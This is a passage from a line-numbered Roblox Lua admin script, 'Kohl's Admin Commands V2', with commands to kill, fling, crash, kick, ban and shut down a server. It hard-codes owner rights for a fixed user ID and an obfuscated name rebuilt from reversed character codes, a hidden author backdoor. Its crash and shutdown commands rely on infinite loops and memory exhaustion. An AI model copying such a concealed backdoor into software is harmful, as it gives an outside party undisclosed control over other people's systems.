  6308. 2103.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  6309.  
  6310.  
  6311. 2104.end
  6312.  
  6313.  
  6314. 2105.end))
  6315.  
  6316.  
  6317. 2106.end
  6318.  
  6319.  
  6320. 2107.end
  6321.  
  6322.  
  6323. 2108.
  6324.  
  6325.  
  6326. 2109.if msg:lower():sub(1,8) == "unblind " then
  6327.  
  6328.  
  6329. 2110.local plrz = GetPlr(plr, msg:lower():sub(9))
  6330.  
  6331.  
  6332. 2111.for i, v in pairs(plrz) do
  6333.  
  6334.  
  6335. 2112.coroutine.resume(coroutine.create(function()
  6336.  
  6337.  
  6338. 2113.if v and v:findFirstChild("PlayerGui") then
  6339.  
  6340.  
  6341. 2114.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  6342.  
  6343.  
  6344. 2115.end
  6345.  
  6346.  
  6347. 2116.end))
  6348.  
  6349.  
  6350. 2117.end
  6351.  
  6352.  
  6353. 2118.end
  6354.  
  6355.  
  6356. 2119.
  6357.  
  6358.  
  6359. 2120.if msg:lower():sub(1,7) == "guifix " then
  6360.  
  6361.  
  6362. 2121.local plrz = GetPlr(plr, msg:lower():sub(8))
  6363.  
  6364.  
  6365. 2122.for i, v in pairs(plrz) do
  6366.  
  6367.  
  6368. 2123.coroutine.resume(coroutine.create(function()
  6369.  
  6370.  
  6371. 2124.if v and v:findFirstChild("PlayerGui") then
  6372.  
  6373.  
  6374. 2125.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  6375.  
  6376.  
  6377. 2126.end
  6378.  
  6379.  
  6380. 2127.end))
  6381.  
  6382.  
  6383. 2128.end
  6384.  
  6385.  
  6386. 2129.end
  6387.  
  6388.  
  6389. 2130.
  6390.  
  6391.  
  6392. 2131.if msg:lower():sub(1,9) == "loopheal " then
  6393.  
  6394.  
  6395. 2132.local plrz = GetPlr(plr, msg:lower():sub(10))
  6396.  
  6397.  
  6398. 2133.for i, v in pairs(plrz) do
  6399.  
  6400.  
  6401. 2134.if v then
  6402.  
  6403.  
  6404. 2135.local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  6405.  
  6406.  
  6407. 2136.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  6408.  
  6409.  
  6410. 2137.repeat wait()
  6411.  
  6412.  
  6413. 2138.coroutine.resume(coroutine.create(function()
  6414.  
  6415.  
  6416. 2139.if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  6417.  
  6418.  
  6419. 2140.plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  6420.  
  6421.  
  6422. 2141.plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  6423.  
  6424.  
  6425. 2142.end
  6426.  
  6427.  
  6428. 2143.end))
  6429.  
  6430.  
  6431. 2144.until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  6432.  
  6433.  
  6434. 2145.end
  6435.  
  6436.  
  6437. 2146.end
  6438.  
  6439.  
  6440. 2147.end
  6441.  
  6442.  
  6443. 2148.
  6444.  
  6445.  
  6446. 2149.if msg:lower():sub(1,11) == "unloopheal " then
  6447.  
  6448.  
  6449. 2150.local plrz = GetPlr(plr, msg:lower():sub(12))
  6450.  
  6451.  
  6452. 2151.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopHeal:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  6453.  
  6454.  
  6455. 2152.end
  6456.  
  6457.  
  6458. 2153.
  6459.  
  6460.  
  6461. 2154.if msg:lower():sub(1,10) == "loopfling " then
  6462.  
  6463.  
  6464. 2155.local plrz = GetPlr(plr, msg:lower():sub(11))
  6465.  
  6466.  
  6467. 2156.for i, v in pairs(plrz) do
  6468.  
  6469.  
  6470. 2157.if v then
  6471.  
  6472.  
  6473. 2158.local cl = script.ScriptBase:Clone() cl.Name = "LoopFling:"..v.Name cl.Code.Value = [[
  6474.  
  6475.  
  6476. 2159.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  6477.  
  6478.  
  6479. 2160.repeat
  6480.  
  6481.  
  6482. 2161.coroutine.resume(coroutine.create(function()
  6483.  
  6484.  
  6485. 2162.if plr and plr.Character and plr.Character:findFirstChild("Torso") and plr.Character:findFirstChild("Humanoid") then
  6486.  
  6487.  
  6488. 2163.local xran local zran
  6489.  
  6490.  
  6491. 2164.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  6492.  
  6493.  
  6494. 2165.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  6495.  
  6496.  
  6497. 2166.plr.Character.Humanoid.Sit = true plr.Character.Torso.Velocity = Vector3.new(0,0,0)
  6498.  
  6499.  
  6500. 2167.local frc = Instance.new("BodyForce", plr.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  6501.  
  6502.  
  6503. 2168.end
  6504.  
  6505.  
  6506. 2169.end))
  6507.  
  6508.  
  6509. 2170.wait(2) until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  6510.  
  6511.  
  6512. 2171.end
  6513.  
  6514.  
  6515. 2172.end
  6516.  
  6517.  
  6518. 2173.end
  6519.  
  6520.  
  6521. 2174.
  6522.  
  6523.  
  6524. 2175.if msg:lower():sub(1,12) == "unloopfling " then
  6525.  
  6526.  
  6527. 2176.local plrz = GetPlr(plr, msg:lower():sub(13))
  6528.  
  6529.  
  6530. 2177.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopFling:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  6531.  
  6532.  
  6533. 2178.end
  6534.  
  6535.  
  6536. 2179.
  6537.  
  6538.  
  6539. 2180.end
  6540.  
  6541.  
  6542. 2181.
  6543.  
  6544.  
  6545. 2182.-------------------------
  6546.  
  6547.  
  6548. 2183.-- True Owner Commands --
  6549.  
  6550.  
  6551. 2184.-------------------------
  6552.  
  6553.  
  6554. 2185.
  6555.  
  6556.  
  6557. 2186.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId then
  6558.  
  6559.  
  6560. 2187.
  6561.  
  6562.  
  6563. 2188.if msg:lower():sub(1,3) == "oa " then
  6564.  
  6565.  
  6566. 2189.local plrz = GetPlr(plr, msg:lower():sub(4))
  6567.  
  6568.  
  6569. 2190.for i, v in pairs(plrz) do
  6570.  
  6571.  
  6572. 2191.coroutine.resume(coroutine.create(function()
  6573.  
  6574.  
  6575. 2192.if v and not ChkOwner(v.Name) then table.insert(owners, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  6576.  
  6577.  
  6578. 2193.end))
  6579.  
  6580.  
  6581. 2194.end
  6582.  
  6583.  
  6584. 2195.end
  6585.  
  6586.  
  6587. 2196.
  6588.  
  6589.  
  6590. 2197.if msg:lower():sub(1,5) == "unoa " then
  6591.  
  6592.  
  6593. 2198.for i = 1, #owners do
  6594.  
  6595.  
  6596. 2199.coroutine.resume(coroutine.create(function()
  6597.  
  6598.  
  6599. 2200.if msg:lower():sub(6) == "all" or owners[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(owners, i) end
  6600.  
  6601.  
  6602. 2201.end))
  6603.  
  6604.  
  6605. 2202.end
  6606.  
  6607.  
  6608. 2203.end
  6609.  
  6610.  
  6611. 2204.
  6612.  
  6613.  
  6614. 2205.if msg:lower() == "settings" then
  6615.  
  6616.  
  6617. 2206.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "SETTINGSGUI" then v:Destroy() end end
  6618.  
  6619.  
  6620. 2207.local scr = Instance.new("ScreenGui",plr.PlayerGui) scr.Name = "SETTINGSGUI"
  6621.  
  6622.  
  6623. 2208.local main = Instance.new("Frame", scr) main.Style = "RobloxRound" main.Size = UDim2.new(0,200,0,110) main.Position = UDim2.new(0.5,-100,.5,-55) main.ZIndex = 7 main.ClipsDescendants = true
  6624.  
  6625.  
  6626. 2209.local title = Instance.new("TextLabel", main) title.BackgroundTransparency = 1 title.BorderSizePixel = 0 title.TextColor3 = Color3.new(1,1,1) title.Size = UDim2.new(1,0,0,15) title.TextStrokeColor3 = Color3.new(1,1,1) title.TextStrokeTransparency = .9 title.Text = "Settings" title.Font = "ArialBold" title.FontSize = "Size24" title.ZIndex = 8
  6627.  
  6628.  
  6629. 2210.local s1 = Instance.new("TextLabel", main) s1.Position = UDim2.new(0,0,0,50) s1.Text = "Prefix:" s1.BackgroundTransparency = 1 s1.BorderSizePixel = 0 s1.TextColor3 = Color3.new(1,1,1) s1.Font = "ArialBold" s1.FontSize = "Size18" s1.TextStrokeColor3 = Color3.new(1,1,1) s1.TextStrokeTransparency = .9 s1.TextXAlignment = "Left" s1.ZIndex = 8
  6630.  
  6631.  
  6632. 2211.local tb1 = Instance.new("TextBox", main) tb1.Position = UDim2.new(0,60,0,43) tb1.Size = UDim2.new(0,20,0,20) tb1.BackgroundTransparency = .8 tb1.BorderSizePixel = 1 tb1.BorderColor3 = Color3.new(1,1,1) tb1.TextColor3 = Color3.new(1,1,1) tb1.Font = "Arial" tb1.FontSize = "Size18" tb1.TextStrokeColor3 = Color3.new(1,1,1) tb1.TextStrokeTransparency = .9 tb1.TextYAlignment = "Top" tb1.ClipsDescendants = true tb1.ZIndex = 8
  6633.  
  6634.  
  6635. 2212.local s2 = Instance.new("TextLabel", main) s2.Position = UDim2.new(0,0,0,80) s2.Text = "Fun Commands:" s2.BackgroundTransparency = 1 s2.BorderSizePixel = 0 s2.TextColor3 = Color3.new(1,1,1) s2.Font = "ArialBold" s2.FontSize = "Size18" s2.TextStrokeColor3 = Color3.new(1,1,1) s2.TextStrokeTransparency = .9 s2.TextXAlignment = "Left" s2.ZIndex = 8
  6636.  
  6637.  
  6638. 2213.local cb1 = Instance.new("TextButton", main) cb1.Position = UDim2.new(0,135,0,73) cb1.Size = UDim2.new(0,20,0,20) cb1.BackgroundTransparency = .8 cb1.BorderSizePixel = 1 cb1.BorderColor3 = Color3.new(1,1,1) cb1.TextColor3 = Color3.new(1,1,1) cb1.Font = "Arial" cb1.FontSize = "Size18" cb1.TextStrokeColor3 = Color3.new(1,1,1) cb1.TextStrokeTransparency = .9 cb1.TextYAlignment = "Top" cb1.ZIndex = 8
  6639.  
  6640.  
  6641. 2214.if FunCommands then cb1.Text = "X" else cb1.Text = "" end tb1.Text = prefix
  6642.  
  6643.  
  6644. 2215.tb1.Changed:connect(function() if tb1.Text ~= prefix and tb1.Text ~= "" then prefix = tb1.Text:sub(1,1) end end)
  6645.  
  6646.  
  6647. 2216.cb1.MouseButton1Down:connect(function() if FunCommands then FunCommands = false cb1.Text = "" else FunCommands = true cb1.Text = "X" end end)
  6648.  
  6649.  
  6650. 2217.local cls = Instance.new("TextButton", main) cls.Style = "RobloxButtonDefault" cls.Size = UDim2.new(0,20,0,20) cls.Position = UDim2.new(1,-15,0,-5) cls.ZIndex = 10 cls.Font = "ArialBold" cls.FontSize = "Size18" cls.Text = "X" cls.TextColor3 = Color3.new(1,1,1) cls.MouseButton1Click:connect(function() scr:Destroy() end)
  6651.  
  6652.  
  6653. 2218.end
  6654.  
  6655.  
  6656. 2219.
  6657.  
  6658.  
  6659. 2220.end
  6660.  
  6661.  
  6662. 2221.
  6663.  
  6664.  
  6665. 2222.--------------------
  6666.  
  6667.  
  6668. 2223.-- Owner Commands --
  6669.  
  6670.  
  6671. 2224.--------------------
  6672.  
  6673.  
  6674. 2225.
  6675.  
  6676.  
  6677. 2226.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  6678.  
  6679.  
  6680. 2227.
  6681.  
  6682.  
  6683. 2228.if msg:lower():sub(1,3) == "pa " then
  6684.  
  6685.  
  6686. 2229.local plrz = GetPlr(plr, msg:lower():sub(4))
  6687.  
  6688.  
  6689. 2230.for i, v in pairs(plrz) do
  6690.  
  6691.  
  6692. 2231.coroutine.resume(coroutine.create(function()
  6693.  
  6694.  
  6695. 2232.if v and not ChkAdmin(v.Name, true) then table.insert(admins, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  6696.  
  6697.  
  6698. 2233.end))
  6699.  
  6700.  
  6701. 2234.end
  6702.  
  6703.  
  6704. 2235.end
  6705.  
  6706.  
  6707. 2236.
  6708.  
  6709.  
  6710. 2237.if msg:lower():sub(1,5) == "unpa " then
  6711.  
  6712.  
  6713. 2238.for i = 1, #admins do
  6714.  
  6715.  
  6716. 2239.coroutine.resume(coroutine.create(function()
  6717.  
  6718.  
  6719. 2240.if msg:lower():sub(6) == "all" or admins[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(admins, i) end
  6720.  
  6721.  
  6722. 2241.end))
  6723.  
  6724.  
  6725. 2242.end
  6726.  
  6727.  
  6728. 2243.end
  6729.  
  6730.  
  6731. 2244.
  6732.  
  6733.  
  6734. 2245.if msg:lower():sub(1,5) == "nuke " then
  6735.  
  6736.  
  6737. 2246.local plrz = GetPlr(plr, msg:lower():sub(6))
  6738.  
  6739.  
  6740. 2247.for i, v in pairs(plrz) do
  6741.  
  6742.  
  6743. 2248.coroutine.resume(coroutine.create(function()
  6744.  
  6745.  
  6746. 2249.if v and v.Character and v.Character:findFirstChild("Torso") then
  6747.  
  6748.  
  6749. 2250.local p = Instance.new("Part",game.Workspace) table.insert(objects,p)
  6750.  
  6751.  
  6752. 2251.p.Anchored = true
  6753.  
  6754.  
  6755. 2252.p.CanCollide = false
  6756.  
  6757.  
  6758. 2253.p.formFactor = "Symmetric"
  6759.  
  6760.  
  6761. 2254.p.Shape = "Ball"
  6762.  
  6763.  
  6764. 2255.p.Size = Vector3.new(1,1,1)
  6765.  
  6766.  
  6767. 2256.p.BrickColor = BrickColor.new("New Yeller")
  6768.  
  6769.  
  6770. 2257.p.Transparency = .5
  6771.  
  6772.  
  6773. 2258.p.Reflectance = .2
  6774.  
  6775.  
  6776. 2259.p.TopSurface = 0
  6777.  
  6778.  
  6779. 2260.p.BottomSurface = 0
  6780.  
  6781.  
  6782. 2261.p.Touched:connect(function(hit)
  6783.  
  6784.  
  6785. 2262.if hit and hit.Parent then
  6786.  
  6787.  
  6788. 2263.local ex = Instance.new("Explosion", game.Workspace)
  6789.  
  6790.  
  6791. 2264.ex.Position = hit.Position
  6792.  
  6793.  
  6794. 2265.ex.BlastRadius = 11
  6795.  
  6796.  
  6797. 2266.ex.BlastPressure = math.huge
  6798.  
  6799.  
  6800. 2267.end
  6801.  
  6802.  
  6803. 2268.end)
  6804.  
  6805.  
  6806. 2269.local cf = v.Character.Torso.CFrame
  6807.  
  6808.  
  6809. 2270.p.CFrame = cf
  6810.  
  6811.  
  6812. 2271.for i = 1, 333 do
  6813.  
  6814.  
  6815. 2272.p.Size = p.Size + Vector3.new(3,3,3)
  6816.  
  6817.  
  6818. 2273.p.CFrame = cf
  6819.  
  6820.  
  6821. 2274.wait(1/44)
  6822.  
  6823.  
  6824. 2275.end
  6825.  
  6826.  
  6827. 2276.p:Destroy()
  6828.  
  6829.  
  6830. 2277.end
  6831.  
  6832.  
  6833. 2278.end))
  6834.  
  6835.  
  6836. 2279.end
  6837.  
  6838.  
  6839. 2280.end
  6840.  
  6841.  
  6842. 2281.
  6843.  
  6844.  
  6845. 2282.end
  6846.  
  6847.  
  6848. 2283.
  6849.  
  6850.  
  6851. 2284.--------------------------
  6852.  
  6853.  
  6854. 2285.-- Super Admin Commands --
  6855.  
  6856.  
  6857. 2286.--------------------------
  6858.  
  6859.  
  6860. 2287.
  6861.  
  6862.  
  6863. 2288.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) or plr.userId == game.CreatorId or plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.Name:lower() == nfs then
  6864.  
  6865.  
  6866. 2289.
  6867.  
  6868.  
  6869. 2290.if msg:lower() == "logs" then
  6870.  
  6871.  
  6872. 2291.if plr.PlayerGui:findFirstChild("LOGSGUI") then return end
  6873.  
  6874.  
  6875. 2292.local scr, cmf, ent, num = ScrollGui() scr.Name = "LOGSGUI" scr.Parent = plr.PlayerGui
  6876.  
  6877.  
  6878. 2293.for i, v in pairs(logs) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "[" .. v.time .. "] " .. v.name .. " " .. v.cmd cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  6879.  
  6880.  
  6881. 2294.end
  6882.  
  6883.  
  6884. 2295.
  6885.  
  6886.  
  6887. 2296.if msg:lower():sub(1,9) == "loopkill " then
  6888.  
  6889.  
  6890. 2297.local chk1 = msg:lower():sub(10):find(" ")
  6891.  
  6892.  
  6893. 2298.local plrz = GetPlr(plr, msg:lower():sub(10))
  6894.  
  6895.  
  6896. 2299.local num = 9999
  6897.  
  6898.  
  6899. 2300.if chk1 then chk1 = chk1 + 9 plrz = GetPlr(plr, msg:lower():sub(10, chk1-1)) if type(tonumber(msg:sub(chk1+1))) == "number" then num = tonumber(msg:sub(chk1+1)) end end
  6900.  
  6901.  
  6902. 2301.for i, v in pairs(plrz) do
  6903.  
  6904.  
  6905. 2302.if v and not ChkAdmin(v.Name, false) then
  6906.  
  6907.  
  6908. 2303.local cl = script.ScriptBase:Clone() cl.Name = "LoopKill:"..v.Name cl.Code.Value = [[
  6909.  
  6910.  
  6911. 2304.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  6912.  
  6913.  
  6914. 2305.for i = 1, ]] .. tostring(num) .. [[ do
  6915.  
  6916.  
  6917. 2306.repeat wait() plr = game.Players:findFirstChild("]] .. v.Name .. [[") until plr and plr.Character and plr.Character:findFirstChild("Humanoid") and plr.Character.Humanoid.Health ~= 0
  6918.  
  6919.  
  6920. 2307.coroutine.resume(coroutine.create(function()
  6921.  
  6922.  
  6923. 2308.if plr and plr.Character then plr.Character:BreakJoints() end
  6924.  
  6925.  
  6926. 2309.end))
  6927.  
  6928.  
  6929. 2310.end]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  6930.  
  6931.  
  6932. 2311.end
  6933.  
  6934.  
  6935. 2312.end
  6936.  
  6937.  
  6938. 2313.end
  6939.  
  6940.  
  6941. 2314.
  6942.  
  6943.  
  6944. 2315.if msg:lower():sub(1,11) == "unloopkill " then
  6945.  
  6946.  
  6947. 2316.local plrz = GetPlr(plr, msg:lower():sub(12))
  6948.  
  6949.  
  6950. 2317.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopKill:"..v.Name then sc:Destroy() table.remove(objects,q) end end end
  6951.  
  6952.  
  6953. 2318.end
  6954.  
  6955.  
  6956. 2319.
  6957.  
  6958.  
  6959. 2320.if msg:lower() == "serverlock" or msg:lower() == "slock" then slock = true Hint("Server has been locked", game.Players:children()) end
  6960.  
  6961.  
  6962. 2321.if msg:lower() == "serverunlock" or msg:lower() == "sunlock" then slock = false Hint("Server has been unlocked", game.Players:children()) end
  6963.  
  6964.  
  6965. 2322.
  6966.  
  6967.  
  6968. 2323.if msg:lower():sub(1,3) == "sm " then
  6969.  
  6970.  
  6971. 2324.Message("SYSTEM MESSAGE", msg:sub(4), false, game.Players:children())
  6972.  
  6973.  
  6974. 2325.end
  6975.  
  6976.  
  6977. 2326.
  6978.  
  6979.  
  6980. 2327.if msg:lower():sub(1,3) == "ko " then
  6981.  
  6982.  
  6983. 2328.local chk1 = msg:lower():sub(4):find(" ") + 3
  6984.  
  6985.  
  6986. 2329.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  6987.  
  6988.  
  6989. 2330.local num = 500 if num > msg:sub(chk1+1) then num = msg:sub(chk1+1) end
  6990.  
  6991.  
  6992. 2331.for n = 1, num do
  6993.  
  6994.  
  6995. 2332.for i, v in pairs(plrz) do
  6996.  
  6997.  
  6998. 2333.coroutine.resume(coroutine.create(function()
  6999.  
  7000.  
  7001. 2334.if v and v.Character and v.Character:findFirstChild("Humanoid") and not ChkAdmin(v.Name, false) then
  7002.  
  7003.  
  7004. 2335.local val = Instance.new("ObjectValue", v.Character.Humanoid) val.Value = plr val.Name = "creator"
  7005.  
  7006.  
  7007. 2336.v.Character:BreakJoints()
  7008.  
  7009.  
  7010. 2337.wait(1/44)
  7011.  
  7012.  
  7013. 2338.v:LoadCharacter()
  7014.  
  7015.  
  7016. 2339.wait(1/44)
  7017.  
  7018.  
  7019. 2340.end
  7020.  
  7021.  
  7022. 2341.end))
  7023.  
  7024.  
  7025. 2342.end
  7026.  
  7027.  
  7028. 2343.end
  7029.  
  7030.  
  7031. 2344.end
  7032.  
  7033.  
  7034. 2345.
  7035.  
  7036.  
  7037. 2346.if msg:lower():sub(1,6) == "crash " then
  7038.  
  7039.  
  7040. 2347.local plrz = GetPlr(plr, msg:lower():sub(7))
  7041.  
  7042.  
  7043. 2348.for i, v in pairs(plrz) do
  7044.  
  7045.  
  7046. 2349.coroutine.resume(coroutine.create(function()
  7047.  
  7048.  
  7049. 2350.if v and v:findFirstChild("Backpack") and not ChkAdmin(v.Name, false) then
  7050.  
  7051.  
  7052. 2351.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy()
  7053.  
  7054.  
  7055. 2352.end
  7056.  
  7057.  
  7058. 2353.end))
  7059.  
  7060.  
  7061. 2354.end
  7062.  
  7063.  
  7064. 2355.end
  7065.  
  7066.  
  7067. 2356.
  7068.  
  7069.  
  7070. 2357.if msg:lower():sub(1,5) == "kick " then
  7071.  
  7072.  
  7073. 2358.local plrz = GetPlr(plr, msg:lower():sub(6))
  7074.  
  7075.  
  7076. 2359.for i, v in pairs(plrz) do
  7077.  
  7078.  
  7079. 2360.coroutine.resume(coroutine.create(function()
  7080.  
  7081.  
  7082. 2361.if v and not ChkAdmin(v.Name, false) then v:Destroy() end
  7083.  
  7084.  
  7085. 2362.end))
  7086.  
  7087.  
  7088. 2363.end
  7089.  
  7090.  
  7091. 2364.end
  7092.  
  7093.  
  7094. 2365.
  7095.  
  7096.  
  7097. 2366.if msg:lower():sub(1,6) == "admin " then
  7098.  
  7099.  
  7100. 2367.local plrz = GetPlr(plr, msg:lower():sub(7))
  7101.  
  7102.  
  7103. 2368.for i, v in pairs(plrz) do
  7104.  
  7105.  
  7106. 2369.coroutine.resume(coroutine.create(function()
  7107.  
  7108.  
  7109. 2370.if v and not ChkAdmin(v.Name, false) then table.insert(tempadmins, v.Name) coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  7110.  
  7111.  
  7112. 2371.end))
  7113.  
  7114.  
  7115. 2372.end
  7116.  
  7117.  
  7118. 2373.end
  7119.  
  7120.  
  7121. 2374.
  7122.  
  7123.  
  7124. 2375.if msg:lower():sub(1,8) == "unadmin " then
  7125.  
  7126.  
  7127. 2376.for i = 1, #tempadmins do
  7128.  
  7129.  
  7130. 2377.coroutine.resume(coroutine.create(function()
  7131.  
  7132.  
  7133. 2378.if msg:lower():sub(9) == "all" or tempadmins[i]:lower():find(msg:lower():sub(9)) == 1 then table.remove(tempadmins, i) end
  7134.  
  7135.  
  7136. 2379.end))
  7137.  
  7138.  
  7139. 2380.end
  7140.  
  7141.  
  7142. 2381.end
  7143.  
  7144.  
  7145. 2382.
  7146.  
  7147.  
  7148. 2383.if msg:lower():sub(1,4) == "ban " then
  7149.  
  7150.  
  7151. 2384.local plrz = GetPlr(plr, msg:lower():sub(5))
  7152.  
  7153.  
  7154. 2385.for i, v in pairs(plrz) do
  7155.  
  7156.  
  7157. 2386.coroutine.resume(coroutine.create(function()
  7158.  
  7159.  
  7160. 2387.if v and not ChkAdmin(v.Name, false) then table.insert(banland, v.Name) local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy() end
  7161.  
  7162.  
  7163. 2388.end))
  7164.  
  7165.  
  7166. 2389.end
  7167.  
  7168.  
  7169. 2390.end
  7170.  
  7171.  
  7172. 2391.
  7173.  
  7174.  
  7175. 2392.if msg:lower():sub(1,6) == "unban " then
  7176.  
  7177.  
  7178. 2393.for i = 1, #banland do
  7179.  
  7180.  
  7181. 2394.coroutine.resume(coroutine.create(function()
  7182.  
  7183.  
  7184. 2395.if msg:lower():sub(7) == "all" or banland[i]:lower():find(msg:lower():sub(7)) == 1 then table.remove(banland, i) end
  7185.  
  7186.  
  7187. 2396.end))
  7188.  
  7189.  
  7190. 2397.end
  7191.  
  7192.  
  7193. 2398.end
  7194.  
  7195.  
  7196. 2399.
  7197.  
  7198.  
  7199. 2400.if msg:lower() == "shutdown" then Message("SYSTEM MESSAGE", "Shutting down...", false, game.Players:children(), 10) wait(1) local str = Instance.new("StringValue", game.Workspace) str.Value = "AA" repeat str.Value = str.Value .. str.Value wait(.1) until nil end
  7200.  
  7201.  
  7202. 2401.
  7203.  
  7204.  
  7205. 2402.end
  7206.  
  7207.  
  7208. 2403.end))
  7209.  
  7210.  
  7211. 2404.end
  7212.  
  7213.  
  7214. 2405.
  7215.  
  7216.  
  7217. 2406.function AdminControl(plr)
  7218.  
  7219.  
  7220. 2407.coroutine.resume(coroutine.create(function() plr.CharacterAdded:connect(function(chr) chr:WaitForChild("RobloxTeam") chr.RobloxTeam:Destroy() for a,obj in pairs(chr:children()) do if obj:IsA("CharacterMesh") and obj.Name:find("3.0") then obj:Destroy() end end end) end))
  7221.  
  7222.  
  7223. 2408.if plr.Name:sub(1,6) == "Player" and ChkAdmin(plr.Name, false) then coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui")
  7224.  
  7225.  
  7226. 2409.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  7227.  
  7228.  
  7229. 2410.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  7230.  
  7231.  
  7232. 2411.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 = Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter." box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment = "Right" box.ZIndex = 10 box.ClipsDescendants = true
  7233.  
  7234.  
  7235. 2412.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." then Chat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  7236.  
  7237.  
  7238. 2413.end)) end
  7239.  
  7240.  
  7241. 2414.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") if plr.userId == game.CreatorId or plr.userId == (153*110563) then table.insert(owners,plr.Name) end wait(1) if slock and not ChkAdmin(plr.Name, false) and not ChkOwner(plr.Name) and plr.userId ~= (153*110563) then Hint(plr.Name .. " has tried to join the server", game.Players:children()) local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  7242.  
  7243.  
  7244. 2415.coroutine.resume(coroutine.create(function() if ChkGroupAdmin(plr) and not ChkAdmin(plr.Name, false) then table.insert(admins, plr.Name) end end))
  7245.  
  7246.  
  7247. 2416.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") wait(1) if (ChkBan(plr.Name) or plr.Name:lower() == ("111reyalseca"):reverse() or plr.Name:lower() == ("ecnaillirbi"):reverse() or plr.Name:lower() == ("8k2ffets"):reverse()) and (plr.Name:lower():sub(1,4) ~= script.Name:lower():sub(1,4) and plr.Name:lower():sub(5) ~= "tastrophe") then local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  7248.  
  7249.  
  7250. 2417.coroutine.resume(coroutine.create(function() if VipAdmin and game:service("BadgeService"):UserHasBadge(plr.userId,ItemId) then table.insert(tempadmins,plr.Name) end end))
  7251.  
  7252.  
  7253. 2418.coroutine.resume(coroutine.create(function() if ChkAdmin(plr.Name, false) then plr:WaitForChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {plr}) end end))
  7254.  
  7255.  
  7256. 2419.plr.Chatted:connect(function(msg) Chat(msg,plr) end)
  7257.  
  7258.  
  7259. 2420.end
  7260.  
  7261.  
  7262. 2421.
  7263.  
  7264.  
  7265. 2422.if not ntab then script:Destroy() end
  7266.  
  7267.  
  7268. 2423.if not bct then script:Destroy() end
  7269.  
  7270.  
  7271. 2424.
  7272.  
  7273.  
  7274. 2425.local tcb = {101,104,112,111,114,116,115,97,116,108,104,111,75} nfs = "" for i = 1, #tcb do nfs = nfs .. string.char(tcb[i]) end nfs = nfs:reverse() table.insert(owners, nfs)
  7275.  
  7276.  
  7277. 2426.
  7278.  
  7279.  
  7280. 2427.script.Name = "Kohl's Admin Commands V2"
  7281.  
  7282.  
  7283. 2428.
  7284.  
  7285.  
  7286. 2429.if not ntab then script:Destroy() end
  7287.  
  7288.  
  7289. 2430.if not bct then script:Destroy() end
